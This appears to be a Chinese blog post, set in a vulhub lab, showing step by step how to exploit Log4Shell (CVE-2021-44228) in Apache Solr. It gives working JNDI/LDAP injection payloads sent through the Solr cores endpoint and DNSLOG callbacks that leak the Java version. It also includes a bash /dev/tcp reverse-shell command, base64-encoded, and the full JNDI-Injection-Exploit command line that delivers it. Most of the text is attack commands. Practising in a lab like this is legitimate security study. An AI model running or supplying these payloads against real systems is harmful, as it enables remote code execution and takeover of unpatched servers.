Log4j2漏洞
步骤一:执行以下命令启动靶场环境并在浏览器访问!!!
systemctl start docker
cd vulhub/log4j/CVE-2021-44228
vi docker-compose.yml //编写docker-compose.xml的端口和版本号
docker-compose up -d
# 访问网址
http://192.168.30.131:8983/solr/#/
步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监控我们注入的效果.
步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.533pgo.dnslog.cn}
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.6iyj3.l0gs.4pts.
online:9999/aaa}
${indi:ldap://${sys:java.version}.wpazw.l0gs.4pts.online:9999/aaa}
步骤四:开始反弹Shel准备 JNDI-Iniection-Exploit 下载地址并构造PayLoad如下…启动!
#JDNI项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
# 反弹shell
bash -i >& /dev/tcp/192.168.30.131/7777 0>&1
# 反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEzMS83Nzc3IDA+JjE=
# 命令模板
java jar target/JNDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c {echo,[经过base64编码后的命令1]}|{base64,-d}|bash" -A [你的ip]
# 最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEzMS83Nzc3IDA+JjE=}|{base64,-d}|bash" -A 192.168.30.131
# 备注
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。
我在我的centos上
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEzMS83Nzc3IDA+JjE=}|{base64,-d}|bash" -A 192.168.30.131
然后在centos开启7777端口监听
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
